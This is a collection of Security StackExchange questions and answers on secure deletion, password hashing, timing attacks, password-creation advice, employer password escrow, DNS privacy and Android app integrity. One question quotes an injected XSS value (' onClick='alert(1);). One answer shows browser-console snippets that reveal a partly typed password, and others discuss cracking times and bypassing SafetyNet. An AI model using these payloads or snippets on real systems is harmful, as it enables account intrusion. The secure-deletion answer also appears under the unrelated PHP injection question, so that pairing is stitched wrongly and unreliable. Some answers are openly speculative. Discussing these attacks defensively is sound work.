After decades of hearing that "delete" does not really make the data impossible to recover, I have to ask WHY the OS was not corrected long ago to do what it should have been doing all along? What is the big deal? Can't the system just trundle along in the background over-overwriting and whatever else has to happen? Why do we need additional utilities to do what we always thought was happening? What is the motivation of OS developers to NOT correct this problem? ADDITION: This is not a technology question, because clearly it IS possible to delete things securely, or else there would not be tools available to do it. It is a policy question: If some people feel that it is important and should be part of the OS, why is it not part of the OS? Many things have been added to OSes over the years, and this could certainly be one of them. And it IS an important issue, or there would not have been articles and stories about it for about 3 decades now. What is with the inertia? Just do the right thing.
Because of the following reasons: Performance - it takes up resources destroying files. Imagine an application that uses hundreds or thousands of files. It would be a huge operation to securely delete each one. Extra wear and tear on the drives. Sometimes the ability to retrieve a file is a feature of the OS (e.g. Trash, Recycle Bin, Volume Shadow Copy). As noted by Xander, sometimes the physical storage mechanism is abstracted from the OS (e.g. SSDs or network drives).
{ "source": [ "https://security.stackexchange.com/questions/110734", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
110,749
I have an input box for for INSERTing into the database. It is written in PHP PDO. Some one typed in: <"'> and also: ' onClick='alert(1); I'm assuming they were in two different input boxes. But somehow, the user was able to modify the a field in the database to a negative number when the only way (if doing it right which is by pressing a button) is to increment by +1 or -1. For example, user presses the "+1" button, it will +1 in the database. If they press "-1" in the database. They have a negative number of -50 or something like that. What could they have done? What is my website vulnerable of? Here is the code: $insertQuery = $dbh->prepare("INSERT INTO fcomments (poster, lid, post_id, comment, time_stamp) VALUES(:user_id, :lid, :post_id, :comment, :timeNow)"); $insertQuery->bindParam(':user_id',$user_id); $insertQuery->bindParam(':lid',$lid); $insertQuery->bindParam(':post_id',$post_id); $insertQuery->bindParam(':comment',$comment); $insertQuery->bindParam(':timeNow',$timeNow); $insertQuery->execute(); It looks like all the values are binded. Not sure what could be the problem?
Because of the following reasons: Performance - it takes up resources destroying files. Imagine an application that uses hundreds or thousands of files. It would be a huge operation to securely delete each one. Extra wear and tear on the drives. Sometimes the ability to retrieve a file is a feature of the OS (e.g. Trash, Recycle Bin, Volume Shadow Copy). As noted by Xander, sometimes the physical storage mechanism is abstracted from the OS (e.g. SSDs or network drives).
{ "source": [ "https://security.stackexchange.com/questions/110749", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97062/" ] }
110,762
Why do most browsers store browsing history by default? It seems like people often have to go to the hassle of manually deleting their history or using incognito mode. Are there some major advantages to storing this data in most cases?
There are a lot of advantages. Here are some: Auto-completion of previously visited URLs you forgot, which can speed up the web surfing process tremendously. You might have remembered parts of a URL or website title, and your browser can usually pick those up if you typed them in. I love this feature. This can offer extra security. As mentioned by kasperd , it can greatly reduce the risk of typosquatting . Storing previously-loaded data in a cache to speed up web-browsing. Great for slow connections. Great for reducing load on web servers. Storing cookies so websites remember your login information, etc.
{ "source": [ "https://security.stackexchange.com/questions/110762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72547/" ] }
110,948
I have a Java Server with Spring Boot and a JS Frontend in AngularJS. My teacher told me to use HTTPS for passwords, because I cannot hash them securely enough, that nobody can hack them. With HTTPS, if I get it right, I do not have to hash it extra. My source: I just send username and password over https. Is this ok? So now to my question: I store the pw in a DB of course. Where should I hash them? Frontend or Backend? If I hash it on frontend, I do not have to do sth else on backend; but if the HTTPS certificate expires I'm insecure . If I do it on backend, I do not have to do sth else on frontend; but if the HTTPS certificate expires I'm insecure . I would use Scrypt, which is made for password hash.
@John already descriped the passing of the password over the network very well (use HTTPS). To answer your question: Where should I hash them? Frontend or Backend? The backend . If you only hash them in the frontend, you are vulnerable to a pass the hash attack. The reason that you hash passwords in your database is to prevent an attacker who already compromised your database from using those passwords. If you hash the passwords in the backend, an attacker has to first crack them to use them on your website. but if you hash them in the frontend, an attacker doesn't need to do this, they can just pass the hash as it is stored in the database.
{ "source": [ "https://security.stackexchange.com/questions/110948", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97323/" ] }
111,040
Say we have a Java web application which uses a shared secret to verify the identity of the client. The secret is stored on the server, and the client transmits the secret over SSL where it is checked: String SECRET_ON_SERVER = "SomeLongRandomValue"; if (secretFromClient.equals(SECRET_ON_SERVER)) { // request verified - client knows the secret } else { // request not verified - generate failed response } String.equals(String) returns as soon as a single character doesn't match. This means an attacker, if they can accurately track the time it takes to respond, should theoretically know how many characters of their attempt - secretFromClient - match the server secret, leading to a plausible brute force attack. But the difference in timings seem to be tiny . Quick investigation suggests the differences are easily in the sub millisecond range. Can I safely ignore these kinds of timing attacks due to its insignificance compared to network noise? Are there examples of successful < 1ms timing attacks over the internet?
In theory, this is a possible exploit, and if you are in super-paranoia mode, you should assume the answer being "Yes". In every other case, the answer will be: "No." . Although there are published papers (one is linked in the answer by @Oasiscircle) which claim that they are able to run successful timing attacks, one has to carefully read the preconditions, too. These published "practical" attacks work on some algorithms on a LAN with one, at most two, switches in between. Which implies an almost perfectly reliable, constant round trip time. For that scenario, it is indeed practical to attack certain algorithms via timing, but this is meaningless in the context of the question. In fact, I consider these remote attacks as "cheating" . The fact that an attack is remote is irrelevant if you carefully design the experiment so the delay is nevertheless almost exactly predictable. When attacking any server on the internet, this precondition does not hold (not even remotely, pun intended ), even on a server that is geographically and topologically near. Also, attacking a string comparison via timing is not at all the same as attacking a RSA calculation. It is much more difficult because the entire operation as well as the measurable difference is a lot smaller. A string comparison of a password (assuming your passwords are "reasonably" sized) takes a few hundred cycles or less, of which the possible initial cache/TLB miss is by far the biggest, dominating factor, followed by the terminal mispredicted branch (which happens for both a match and a non-match). The difference between a match and a non-match is maybe one or two dozen nanoseconds. A context switch takes several hundreds of nanoseconds, as does a cache miss. Schedulers typically operate at a micro- or millisecond resolution and do some very non-trivial work (in the hundreds/thousands of nanoseconds) in between at times that are hard to predict to say the least. Reliably measuring differences on the nanosecond scale at all is not entirely trivial, either. Ordinary programmable timers do not nearly have the required resolution. HPET on commodity hardware is guaranteed to deliver 100ns resolution (per specification) and in practice goes down to 1ns on many implementations. However, it works by generating an interrupt . This means you can schedule a timer to some point in time precise to the nanosecond, but you cannot really use it to measure single nanoseconds. Also, the interrupt adds an overhead and uncertainty of some dozen nanoseconds (... to some dozen nanoseconds that you want to measure!). Cycle counters need to be serialized to be accurate. Which, too, renders them rather useless for precisely measuring an external event at nanosecond resolution since their accuracy depends on what the pipeline looked like. There are more things to consider which add unpredictable noise, such as legitimate users (yes, those exist, too!) and interrupt coalescing. Trying to divine something-nano from samples that include several something-different-nano as well as something-micro and several something-milli is a Herculean task. That's noise from several independent sources on every scale. Finally, consider the mention of "Java", which means that e.g. a garbage collector may be executing at an unpredictable time (in any case, unpredictable for a remote attacker), causing unpredictable jitter on an unknown (micro, milli?) scale. In theory, you could of course collect a large number of samples, even at lower resolution, say microsecond scale, and statistically eliminate the various sources of noise. You would never be able to tell for absolutely certain whether a password is correct, but you will eventually be able to tell with a sufficiently high probability (say 85% or 90%, or even 99%), and you can then manually verify those few candidates. That's good enough! This is possible , at least in theory, but it would take a huge number of samples even for divining a single password. And saying "huge" is really an understatement of galactic proportions. The number of samples needed practically implies that you must parallelize the attack, or it will take forever. Now, parallelizing such a timing attack to any serious extent is not easily possible because you are subject to the observer effect (in the same sense as in quantum mechanics). Doing a couple of probes (maybe 5-8) in parallel should work, presuming that the server has enough idle cores, but as you scale up, eventually one probe will inevitably affect another probe's outcome in an unpredictable and disproportionate way. There is nothing you can do to prevent that from happening, so parallelizing doesn't really work well (I am not even taking into account the fact that interrupts usually go over a single core and that there is only a single physical copper wire which data must go through, so even if the server still has idle cores remaining, it may quite possibly be the case that one probe affects another). On the other hand, running a not-massively-parallel attack is bound to fail because you will die of old age before you find a single password.
{ "source": [ "https://security.stackexchange.com/questions/111040", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24011/" ] }
111,260
In this article on the BBC’s website they offer advice on how to develop a password. The steps are as follows. Step 1: Choose an artist (a recording artist I presume) Lets choose as an example case study the teen idol and all round bad boy Justin Bieber.* Step 2: Choose a song. (The catcher the better) Next, I need to choose a song from the Biebs vast repertoire of classics. My particular favourite of his, is his insightful look into the dark world of controlling relationships “Boyfriend”. Step 3: Choose some lyrics Now I need some lyrics from “Boyfriend”, I'll go with the slightly menacing chorus. “ If I was your boyfriend, I'd never let you go ” Step 4, 5 and 6: Passwordify the lyric Now we need to take the Biebs prose and turn into a password. We do this by taking the first letter of each word in the lyric “If I was your boyfriend, I'd never let you go, I'd never let you go” iiwybinlyg Make it case sensitive: iIwyBiNlYg Turn it into 'leet speak' by changing it up with symbols and numbers: 1Iwy&1NlY9 My question isn't about the mathematical strength of passwords which obviously will depend on the lyric that is chosen and how one goes about passwordifying it, it is more about the the predictability of the total amount of possible passwords that are likely to pop up using this method. As we are all aware, humans can be very predictable creatures, it wouldn't take a huge amount of effort to generate dictionaries based on certain demographics, music genres, or targeted attacks based on profiling individuals. My initial thoughts on this was that this would be terrible advice to give out in a business as it would lead to many users using the same formula to develop their passwords, which would only be exacerbated by making the passwords more predictable. On a national scale this could be sound advice, which leads me to my question: Is the BBC’s advice on how to choose a password sensible, given how predictable we humans are? If so, in what scenarios is this sensible advice? *Justin Bieber used for humorous reasons only.
My question isn't about the mathematical strength of passwords which obviously will depend on the lyric that is chosen and how one goes about passwordifying it, it is more about the the predictability of the total amount of possible passwords that are likely to pop up using this method. This is a good question, and I'm going to depart from the norm here, put on my tinfoil hat, and say "no, this is not a good idea." Why? Let's look at it in the context of the Snowden leaks. Because the GCHQ spies on all traffic on the British internet , and according to the Snowden leaks , your internet traffic is shared with the five eyes. Even if you're using HTTPS, this is a bad idea. "But Mark Buffalo, you're being a maniac tinfoil hattist again!" Think about it. The time to crack your password was suddenly and significantly reduced. How? GCHQ takes history of your online searches. They likely know when you signed up for a certain website thanks to XKeyscore . If they know when you signed up for that website, they'll see you went to Google.com around that time and did a search for song lyrics. Even if you're using HTTPS, the fact that you connected to google.com around that time, and then visited a website that hosts song lyrics, is all they need to begin breaking your password. Even if they can't view the traffic, they can still see that you connected. Even if you're using HTTPS, this doesn't stop them from hosting lyric websites themselves. This also doesn't stop companies from logging your search results, and it doesn't stop the companies from providing these results to anyone. If they know what kind of songs you like, or don't like, it makes it even easier. Now they can write an algorithm to crack your passwords much, much easier than brute-forcing every possible combination. Or even better yet, use a ready-made password cracker with a provided dictionary of those results. But Mark Buffalo, the government isn't monitoring me! That's all fine and dandy. You generally don't need to worry about them unless you're a criminal. Or you're privacy-conscious . Or you're a security researcher. There's another important aspect you need to consider, which I think is far worse than the government: advertisement companies, and hackers "But Mark Buffalo, I use NoScript (great) and Ghostery (Ghostery sells your info)!" Most people don't use those. And many people who do, also don't use those tools when they use their smartphone. There are data trails everywhere, especially if you own a smartphone (android in particular), and there are plenty of evil marketing companies that will sell your data down the river the first chance they get. Or maybe they aren't evil companies, but they get breached by hackers. Anyone with a "need" could buy that data, and those sophiscated enough could steal it. While this seems like frantic worrying for such a small thing for most people, it gets much worse when you delve into the realm of federal contracting. This is one of the ways security breaches start. All of the steps listed previously could be done without XKeyscore. They can be done very easily with vast marketing databases. Stop the tinfoil, Mark. If I were wearing my tinfoil hat right now, I'd believe this article was made as part of a plan to intentionally weaken standards. I personally believe that weakening standards is a national security risk, especially when federal contractors adopt those weakened standards. Personally, I would worry more about evil marketing companies and hackers than I would the government . Especially when deliberately-weakened standards are what help potentially-hostile countries gain unauthorized access to critical infrastructure and intellectual property. But seriously, this makes your password weaker Now let's talk about numbers, and social engineering. With a normal brute force of this password, you'd likely need the following characters based on this password policy: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= That's 76 possible characters. With this password method, assuming most people will use 6-7 words to generate the password, and perhaps add 1 symbol - !@#$%^&*() being the most common - plus a number, you'll need to test - for an 8-character password - 1,127,875,251,287,708 combinations to exhaust the password space. This could take an impossibly long time depending on the hashing algorithm and hardware. Let's use md5 as an example (it's terrible, but it's computationally cheap. Please don't use md5; I am only using it as an example) . To exhaust the character space of an 8 character password, it would take 4 years to crack with a cheap workstation. About 4 years 25 days 7 hours 46 minutes 54 seconds. If you were to up the password length to 9, it would take over 309 years. Keep in mind that processing power is growing rapidly. Learning extra parameters about the user's password allows you to simplify this. Let's assume that you choose the following song: baby hit me one more time . This is your favorite song, and I know this because I socially-engineered you into telling me. Let's choose a predictable lyric phrase to create a password with: Hit me baby one more time . This becomes HmBomT . Now let's add some leet with a number. Now we have H@BomT3 . Now that we know your favorite song, and your favorite phrase, this is what your password alphabet space becomes: hHmMbBoOmMtT1234567890!@#$%^&*()-_+= As you can see, this alphabet space is significantly reduced. It's much, much faster if you know what character the password starts with, but let's assume you don't. Let's further assume it's been randomized. Now you've reduced the time needed to exhaust the password space to 2,901,713,047,668 combinations, it takes 3 days to crack the password with a cheap workstation. Let's upgrade it to 9 characters. Now it takes 137 days 15 hours 47 minutes. You can calculate this yourself (charset: custom). Also, all of this assumes you don't have a dedicated GPU cluster . EDIT : It's come to my attention that there is now evidence of custom hardware solutions dedicated to cracking bcrypt, one of which is a lot less expensive than a 25-GPU array, uses less power, and is vastly superior in every regard. Please read this amazing article if you want to learn more. But shouldn't we simply increase password length? Yeah, you could. Truthfully, it greatly increases entropy when you increase the password length. However, then it becomes annoying to enter - especially for corporate environments that require you to log out every time you leave the computer. On top of that, it's very hard to remember this password. You might eventually forget it after entering different passwords and being forced to change every few months. Even worse, you could forget it immediately, and be forced to visit the IT help desk to reset your password. This results in costs to the business, and lost productivity. In fact, a better method would be a xkcd's correct horse battery staple . You could use an upper case somewhere, and a number somewhere else, or you could make it even easier while increasing entropy: something like correct horse battery staple gasoline . It's very easy to remember, very easy to type, and it's very hard for computers to break. Also remember that this should be randomly-generated from a 2048 word list. For websites, I would recommend a password manager such as KeePass. I would not use LastPass , as it's vulnerable to phishing attacks. Websites can know you have LastPass enabled, because your browser is sending this information to the website if requested! This is part of how browser-fingerprinting works. For corporate and other logins which you aren't able to use a password manager with, I would recommend a variant of correct horse battery staple with an extra word. Maybe correct horse battery staple gasoline ? Much easier to remember.
{ "source": [ "https://security.stackexchange.com/questions/111260", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83641/" ] }
111,597
Let's say I have a video file that is split into multiple parts. Each piece is 2 Megabytes. I also have a list of the *insert hash name here* for each piece and also for the full file. Now assume that I have misplaced/lost/fubar one of these pieces. Could I retrieve the lost piece from its hash, using brute force or any other method in a human-lifespan amount of time? A rainbow-style table would be unfeasible, I think. Bonus numerical question - how much would it take on a medium-size distributed computing network based on mostly consumer PCs? (Example: 4 GHz CPU + entry level GPU + 8 GB RAM)
A simple answer, NO. It is like asking, if I know, that x%4 = 3 , is it possible to find the value of x ? No. Surely, there would be infinite values of x satisfying this equation, but you wouldn't simply know which one is correct. Similarly, many(or infinite) video clips could result in a given hash value(obviously, infinite video clips have to be mapped to a specific number of hash values, so collisions are bound to happen). You wouldn't know which clip is correct. That too, in human time? No. EDIT: As pointed out in comments, since the file is chunked into pieces of 2 MB, there won't be infinite possibilities, but it would be pretty large(2 raised to power of 16.7 million, approximately). Brute-forcing such a large number of possibilities, in human time, is still close to impossible. But yeah, it's not infinite .
{ "source": [ "https://security.stackexchange.com/questions/111597", "https://security.stackexchange.com", "https://security.stackexchange.com/users/41866/" ] }
111,611
My employer wants/wanted to install a 3rd party app on my personal cell phone. One of the issues that we are still not seeing eye-to-eye with is regarding security. Here are some issues that concern me: The 3rd party sent everyone in our company the same password in a company-wide e-mail. The app does not have a way to change the password. All of our usernames are predetermined and easily guessable. It's possible to login as anyone from any device into this app. My boss has used a car analogy, suggesting that I'm requesting security similar to "full roll cage, 5 point safety harness, helmet, and HANS device, and a fire suppression system". I've pointed out that the security of the app is more like that of a Ford Pinto. I've compared his car safety analogy to "more like using 2-factor authentication with 32 character randomly generated password using a mix of lowercase, uppercase, numbers, and special characters stored via salted password (inefficient) hashing with each user having a different randomly generated salt". I am no security expert. Perhaps I was incorrect with my response to him. Can someone point me to either a better response (e.g. an unbiased source)? Update A few people have asked what type of app it is. The best way I can explain it is a social media app for just our company.
Let's address your points one by one. The 3rd party sent everyone in our company the same password in a company-wide e-mail. A password that everyone knows is not a password. It's like leaving the key under the mat, only without the mat to hide it. The app does not have a way to change the password. So if you ever lose your keys or think someone else might have them, you can't change the locks - and from point 1, we know that your keys are already in other people's hands. All of our usernames are predetermined and easily guessable. So, the people who have your keys also know where you live. It's possible to login as anyone from any device into this app. Put the first three together - other people have your keys, they know where you live, and you can't change the locks - and yeah, this is the result. Anyone can get into somewhere that should be yours alone. To recycle your employer's car analogy, he's asking all employees to lock their cars but leave the keys in the door, and then park in the company car park underneath a sign with their name on. And on top of all this, he's asking you to do this on your personal phone. Your employer has no right to be touching that device. Depending on what this app does, this could be exposing your personal data to risk because of a third-party security flaw that you have no control over. Even if the third-party app isn't malicious and doesn't do anything that causes a risk, there's no guarantee that it's 100% free of accidental flaws or bugs that might cause a security weakness or present an opportunity for some other malicious party to exploit. Given this third-party company's atrocious handling of basic security practices like "don't email passwords", "don't re-use passwords", and "always allow users to change their passwords", the chances of their app being completely safe, secure and free of vulnerabilities is looking pretty slim.
{ "source": [ "https://security.stackexchange.com/questions/111611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98125/" ] }
111,642
Would it be a good idea if you had one account which would require two different passwords ? For example your login details were: email: [email protected] password 1: P4$$w0rd1 password 2: HereIsMySecondPassword Now when the user logs in to my site he is required to enter both passwords. Would this be a better idea than just one stronger password ? The user could choose two passwords which he can easier remember than one strong.
Not really. It's essentially one password, with a press of the return key as one character. It adds complexity to the log in process, which isn't generally a good thing (users would probably choose one good password, and one quick to type password). Don't forget @AviD's rule: "Security at the expense of usability, comes at the expense of security" Depending on how the passwords were stored, they would slightly decrease the ability of attackers to brute force accounts, since an attacker would need to break both parts. I doubt that this balances out the usability issue though.
{ "source": [ "https://security.stackexchange.com/questions/111642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93860/" ] }
111,654
I was reading Breaking VISA PIN by L. Padilla. He stated that changing the PIN will change the stored data on the card. But, I tried on several cards and changing the the PIN does not affect the data stored on tracks 1 and 2. How can I interpret that? Is there any way to extract PIN from these data? Here is some sample data: Track1: PAN:6104XXXXXXXXXXXX Expiration date:1608 service code:100 Discretionary data: 91516084076901530 Track2: PAN: same as track1 Expiration date:1608 service code:100 Discretionary data:9154177591894 Using another reader: ;6104XXXXXXXXXXXX=16081009154177591894?
In the past they may have encoded the PIN on the card, however hopefully (as your test indicates) they have stopped. It looks like the article that you cite is from 2009, which is rather out of date. As to why they should not encode the PIN onto the card take a look at the NIST Special Publication 800-63-2, the Electronic Authentication Guideline. In the case of Multi-Factor authentication it should consist of a combination of "Something you know, something you have and something you are". For a card and PIN system you have something (the card) and know something (the PIN). If you encode the PIN onto the card then you only have something, which is single factor authentication and is not as secure. If you are interested in the security of PINs in credit cards you can take a look at: https://www.pcisecuritystandards.org/documents/PCI_PIN_Security_Requirements.pdf . This is the PCI requirements for securing PINS. As for the differences in the Discretionary Data these may come from several sources. From ISO/IEC 7813 the maximum record length of track 1 and 2 are different. The DD is used to fill the balance of characters. For Discretionary Data the implementation is left up to the issuing company. As to what it might contain you may be able to find out by looking at the documentation from the issuing company (I rather doubt you will find anything but stranger things have happened). It may just be random padding to reach the proper length or it could contain additional data. See https://stackoverflow.com/questions/12239855/discretionary-data-from-magnetic-strip-credit-card-how-to-parse .
{ "source": [ "https://security.stackexchange.com/questions/111654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90801/" ] }
111,748
Looking at a Unblock-US Features (a DNS provider) on their website it states the following: Stay out of the radar of prying eyes. With Unblock-us, you’ll have peace of mind knowing that your ISP or government is unable to view your online activity. We only send a small percentage of data to the websites we support through our secure servers, and we never log or analyze any data passing through. The solution to this invasion of privacy? When you sign up for Unblock-Us, you’ll receive a new set of DNS codes to add within your device’s settings. Your true IP address will then be masked and you’ll be able to bypass any restrictions or spying implemented by your ISP or government, all with this simple switch. So my question is: How can changing your DNS prevent your ISP or government from seeing your online activity? If my understanding of how a DNS works is correct I don't see how these claims are possible
Essentially, it doesn't. DNS servers let your computer look up where websites and other services are based on friendly names, by converting those to IP addresses. Your ISP provides this as a service, but knows precisely who you are, and what IP your computer has, so can easily look up to see that @user1 has made a request to look at google.com . A third party provider knows what IP address your computer is on (else it couldn't reply to queries), and what sites you are looking for. If they are a free, registration free provider, such as OpenDNS, that's all they know. They can take a pretty good guess at your ISP, and probably your geographical location (since most ISPs assign IPs based on location), but they don't have direct access to your name, or to any other data you send to websites. However, even when using a third party DNS provider, the actual traffic between you and websites goes over your ISPs network. In this case, they can see that @user1 visited 173.194.113.80 and made some requests. If the site is running over HTTP, they can even see that you requested pages from a specific host, thanks to header data such as Host: google.com in each request, and the specific pages thanks to the HTTP verb used (e.g. GET /search?q=dodgy+things ). If the site is running over HTTPS, they just get the IP address, but that's probably enough for them to work out what site you were on, just not the specific pages you looked at.
{ "source": [ "https://security.stackexchange.com/questions/111748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }
111,809
I am using an online service that I recently had to reset my password because I forgot it. When I went to change password I wanted to use one with a symbol !@£$%^&*() . When I clicked "confirm password" it displayed "_Invaid Data" to me which I eventually found is because of the symbol. I then spoke to customer services and told them about this (as well as to replace "_Invalid Data" with "Passwords can only contain letters and numbers") and they replied back saying "Sorry, the guidelines we put in is place is for security measures". (This is what the message sounded like to me) The question is why did they say that its insecure to allow symbols in passwords when symbols make it safer? To make sure they have better security in the future I did educate them and said that if you have a 8 character long password with letters and numbers only, it would allow for 36^8=2,821,109,907,456 combinations where as including the 12 symbols( !@£$%^&*()_+ ), it would allow for 48^8=28,179,280,429,056 characters long, meaning there is an extra 25,358,170,521,600 combinations and they are now forwarding this information onto their manager.
These 'security measures' aren't for your security, but for theirs. Symbols like hyphens, apostrophes, percent signs, asterisks, slashes, periods, etc. are useful to attackers for performing "injection" attacks, like SQL Injection, XPath Injection, file path injection, etc. By blocking those characters, the site owners hope that they are preventing you from attacking their servers. They should probably be focused more on proper data handling, like internally using parameterized SQL and special character escaping, but this is an additional measure that could help serve as a stopgap in case they have a hidden coding error in their site. I can't definitively answer 'why' they did this. Maybe they had a security auditor who said "use a whitelisted character set for user input, and block any non alphanumeric symbols." Maybe the web package they bought came with that restriction. Maybe their Vice President of Security said "add some visible measures that give our customers the impression that we take security seriously." Who knows why?
{ "source": [ "https://security.stackexchange.com/questions/111809", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83307/" ] }
111,840
When you're writing a report, what person do you write it as? First person singular : I discovered a vulnerability in HP Power Manager... First person plural : We discovered a vulnerability in HP Power Manager... Third person singular, by name : Bob discovered a vulnerability in HP Power Manager... Third person singular, general : The tester discovered a vulnerability in HP Power Manager... Third person singular, attacker : The attacker discovered a vulnerability in HP Power Manager...
Some other options: Passive voice : A vulnerability in HP Power Manager was discovered... Present tense : HP Power Manager is vulnerable to... It is most common (in the UK at least) to use the passive voice. I prefer using present tense when possible, and first person plural otherwise; the writing feels more personal. But this is controversial; a lot of people think reports are supposed to be formal and not at all personal.
{ "source": [ "https://security.stackexchange.com/questions/111840", "https://security.stackexchange.com", "https://security.stackexchange.com/users/39952/" ] }
112,012
I just sat down at my work computer and began to unlock it by typing in my password, I got 6 of the 8 characters in and decided I wanted coffee and walked away to get it. I came back, realized I left most of the password in, typed in the remaining two characters and logged in. Out of pure curiosity, is there a security risk in that? My thoughts are in most cases it wouldn't be problematic because it gives an attacker one attempt before it is reset and they must start from scratch. However, I suppose at a minimum it lets the attacker know your password is at least that number of characters long (assuming you typed it right) giving them an advantage for future attacks. Is there perhaps a way to grab the text that is typed into the login box, or maybe save the state so you can keep retrying from that partially completed point? What if this were a web page login as opposed to a desktop app?
Corporate espionage is a thing. There could be a security risk if someone has seen you typing your password, or guesses the last two characters. It's not all that difficult to notice people's keystrokes and subconsciously remember them, especially the last few keys. In the case of corporate espionage, someone might want to watch you type your password, and they might remember it. or maybe save the state so you can keep retrying from that partially completed point? You have to admit, given the circumstances, this seems like next-level tinfoil hattery. I can just picture a guy in a grey suit walking up to your desktop, looking for your 20+ GB virtual machine disk, plus accompanying configuration data within a couple minutes, and taking it to a seedy cubicle in the corner of the office, then madly brute-forcing while cackling maniacally: Let's take off the foil for a second. If you are running a virtual machine, then it's quite possible. You could save the state of the virtual machine at that point, and keep trying. The likelihood of this happening to you during a coffee break is pretty much zero. Same with the app state, only not as unlikely as a virtual machine. With the virtual machine, a colleague would have to copy the contents of your virtual hard-drive, plus the accompanying settings, and mount it. More than likely, this would be in excess of 20 GB. Copying this virtual drive in such a short time while other people are around seems quite unlikely. Someone will notice something. What if this were a web page login as opposed to a desktop app? Let's put on our tinfoil hats and see what we can do to retrieve the partially-typed password using only readily-available tools. Put yourself in the shoes of the attacker: how would you quickly get the password before the coffee break is over? Using the developer console, you can modify the web page to change this: <input type="password" name="pass" id="password"/> To this: <input type="text" name="pass" id="password"/> (Removed jQuery as suggested by Doyle Lewis ) We can also get the values through the console input: you can use a variation of these ( F12 > Console > Enter input ): console.log($("#password").val()); (jQuery) console.log(this.pass.val); console.log(document.getElementById("password").value); (dom) Apparently Windows 8 and Windows 10 Enterprise have an "eye" icon that allows you to reveal the plain-text password when holding down the eye button . This becomes an even bigger threat when someone else can just click that one button, bypassing all of the effort used in the examples above. But why would this be a potential security risk? Re-equipping our [Tinfoil Hat (Mythic Warforged)] , let's assume a worst-case scenario: With your username and password, in an enterprise setting where it definitely isn't difficult to find your username (usually your badge ID, or email username), a malicious colleague can attempt to impersonate you on the network. For example: Your corporation has WiFi access which requires your employee badge number and password to sign in. Malicious colleague logs onto the corporate network using your credentials , on an unauthorized device, and then wreaks havoc / steals things without it leading back to them. Most security policies should require device registration first, but there are unfortunately ways around that. You get blamed. It looks like you did it. And the spy who screwed things up may get away scott free . How do I protect against this? This very unlikely, but possible attack, and many other attacks that require physical access to your machine (not including hardware-based infections), is completely mitigated by locking your workstation before getting up, and not entering partial passwords. Make this your habit, and you won't have to worry about anyone doing something like this. Don't get complacent, though.
{ "source": [ "https://security.stackexchange.com/questions/112012", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83603/" ] }
112,311
During an internship for a small company, my boss created an account for me, so I generated a password and I used it. The next day, my boss told me to write down the password of my account on a piece of paper, put it in a letter and to sign the envelope. Then he took the letter and told me that if he needs to access my account and I am unreachable, he is authorized to open the envelope and read the password to use it. He also told me that this is a common practice in all companies . Now I don't know if every company does this (I don't think so) but, to me, it's not legal. Let's say that my boss is a bad person ( he's not ) and he wants to frame me for something that he did. He only has to open the letter and read my password (let's say that I'm unreachable) and do his nefarious activity with my account. Now let's say that I can't prove my innocence . How I can prevent all of this? I thought of writing down a wrong password, but if he really needs my account and I'm unreachable, I'll put him in a bad situation. So, is there a way to protect myself (without refusing to write down the password)?
That's what the envelope is (or should be) for: In order to use your password, one needs to break the seal of the envelope you signed. When you think your password was abused, you can ask to see the envelope with your signature and check if it is still unopened. All you need to do is that should your management ever require your password, change the password and hand in a new envelope. You might want to change your password in regular intervals anyway: It's common best practice. By the way: In companies with a proper IT management this method is unnecessary, because system administrators can receive any necessary information from user accounts without having to know the passwords of the user. If an administrator really needs to log into a user account, they would reset the password (which would create a verifiable audit trail). And there is usually more than one system administrator, so the admin accounts do not require this method either.
{ "source": [ "https://security.stackexchange.com/questions/112311", "https://security.stackexchange.com", "https://security.stackexchange.com/users/42544/" ] }
112,312
I have android applications (Mobile banking) that connect to my server and do online transactions (via Internet/USSD/SMS), I want to make sure those clients are not tampered with and are the original ones distributed by me. Keep in mind that not all of my customers download the application via google play, some of them use 3rd party markets or download the apk from elsewhere. Is there a way I can validate the integrity of the application (using a checksum or a signature) on the server side to make sure its not tampered with. (e.g a trojan is not implanted in the application and then redistributed) For suggested solutions: Can they be implemented over all 3 communication channels (SMS/USSD/Internet) or are the solutions proprietary to one/some channels? (I'm looking exactly for the technique that's been referred to in this page: https://samsclass.info/android/chase.htm ) : Chase's servers don't check the integrity of their Android app when it connects to their servers. It is therefore easy to modify the app, adding trojan code that does malicious things. An attacker who can trick people into using the trojaned app can exploit them. This vulnerability does not affect people who are using the genuine app from the Google Play Store. It would only harm people who are tricked into installing a modified app from a Web site, email, etc.
Update: For 2024, Google has replaced the SafetyNet API with the Play Integrity API . They are conceptually very similar, so the following still largely applies, although the details may differ with the new API. Use Android SafetyNet . This is how Android Pay validates itself. The basic flow is: Your server generates a nonce that it sends to the client app. The app sends a verification request with the nonce via Google Play Services. SafetyNet verifies that the local device is unmodified and passed the CTS . A Google-signed response ("attestation") is returned to your app with a pass/fail result and information about your app's APK (hash and sigining certificate). Your app sends the attestation to your server. Your server validates the nonce and APK signature, and then submits the attestation to a Google server for verification. Google checks the attestation signature and tells you if it is genuine. If this passes, you can be fairly confident that the user is running a genuine version of your app on an unmodified system. The app should get an attestation when it starts up and send it along to your sever with every transaction request. Note, however, this means: Users who have rooted their phone will not pass these checks Users who have installed custom or third-party ROM/firmware/OS (eg Cyanogen) will not pass these checks Users who do not have access to Google Play Services (eg Amazon devices, people in China) will not pass these checks ...and therefore will be unable to use your app. Your company needs to make a business decision as to whether or not these restrictions (and the accompanying upset users) are acceptable. Finally, realize that this is not an entirely airtight solution . With root access and perhaps Xposed, it is possible to modify the SafetyNet library to lie to Google's servers, telling them the "right" answers to get a verification pass result that Google signs. In reality, SafetyNet just moves the goalposts and makes it harder for malicious actors. Since these checks ultimately have to run on a device out of your control, it is indeed impossible to design an entirely secure system. Read an excellent analysis of how the internals of SafetyNet work here.
{ "source": [ "https://security.stackexchange.com/questions/112312", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81374/" ] }
112,319
